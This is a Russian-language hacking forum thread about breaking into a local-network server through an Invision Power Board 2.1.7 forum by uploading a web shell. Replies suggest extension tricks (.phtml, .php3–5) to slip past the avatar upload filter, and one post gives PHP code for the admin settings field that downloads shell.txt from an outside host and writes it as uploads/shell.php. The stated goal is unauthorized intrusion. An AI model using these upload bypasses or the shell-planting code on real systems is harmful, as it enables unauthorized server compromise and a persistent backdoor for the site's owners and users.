Проблема с заливкой шелла в Invision Power Board v2.1.7

Discussion in 'Песочница' started by DeadMeat, 6 Oct 2006.

Thread Status:
Not open for further replies.
  1. DeadMeat

    DeadMeat New Member

    Joined:
    28 Sep 2006
    Messages:
    5
    Likes Received:
    1
    Reputations:
    1
    доброго времяни суток...

    подскажите куда ломиться, только именно подсказать интересней самому врубиться )

    итак у меня задачка сломать сервак локальной сети...
    пробывал ломиться через форум Invision Power Board v2.1.7
    заливка шелла через аватары и фоты обламилась... единственное, что мне показалось неадекватным, это реакция сервака на имя файла... если я пытаюсь залить так script.php.jpg - он переименовывает весь фаил так av-(uid).txt
    script.PHP.jpg - просто не пускает, также как и просто некорректный джипег... лажа какая-то... :confused:

    подскажите может не в той стороне копаю ???
     
  2. Brahma

    Brahma Elder - Старейшина

    Joined:
    14 Jul 2006
    Messages:
    55
    Likes Received:
    13
    Reputations:
    6
    попробуй не .php а .phtml или .php3,4,5
     
  3. DeadMeat

    DeadMeat New Member

    Joined:
    28 Sep 2006
    Messages:
    5
    Likes Received:
    1
    Reputations:
    1
    некатит (( всёравно переименовывает в тхт
     
  4. DeadMeat

    DeadMeat New Member

    Joined:
    28 Sep 2006
    Messages:
    5
    Likes Received:
    1
    Reputations:
    1
    да кстати меня интересует вопрос... можно-ли запустить скрипт с удалённого сервера через аватару... если какчать через какоёнить сервак то пхтмл и пхп не переименовываються... хотя и скрипт не скачиваеться а пишеться как ссылка
     
  5. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    php исполняеться на самом сервере!
    Толку не будет никакого.
     
  6. DeadMeat

    DeadMeat New Member

    Joined:
    28 Sep 2006
    Messages:
    5
    Likes Received:
    1
    Reputations:
    1
    блин будем пробывать ломиться через самопальные скрипты... будем надеяться на ошибки кодера...
     
  7. pogant

    pogant Elder - Старейшина

    Joined:
    24 Jun 2006
    Messages:
    30
    Likes Received:
    5
    Reputations:
    0
    если есть доступ в админку то попробуй через настройки.там когда создаёшь новую то есть поле "выполнить php код до сохранения настройки"
    туда вписывай
    $linky="http://site.com/shell.txt";
    $saved="/home/empire/public_html/uploads/shell.php"; (путь посмотри в настройках)
    $from=fopen("$linky","r");
    $to=fopen("$saved","w");
    while(!feof($from)){
    $string=fgets($from,4096);
    fputs($to,$string);
    }
    fclose($to);
    fclose($from);
     
    #7 pogant, 31 Dec 2006
    Last edited: 31 Dec 2006
  8. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Ты не зальёшь картинку шелл =(
     
  9. ICQ Hool

    ICQ Hool Elder - Старейшина

    Joined:
    31 Mar 2008
    Messages:
    175
    Likes Received:
    25
    Reputations:
    0
    в 2.3.6 php переименовывает в txt а phtml оставляет как есть, но показывает как txt =(
     
  10. drim

    drim Member

    Joined:
    27 Aug 2009
    Messages:
    347
    Likes Received:
    33
    Reputations:
    4
    http://forum.antichat.ru/thread76949.html
     
Loading...
Thread Status:
Not open for further replies.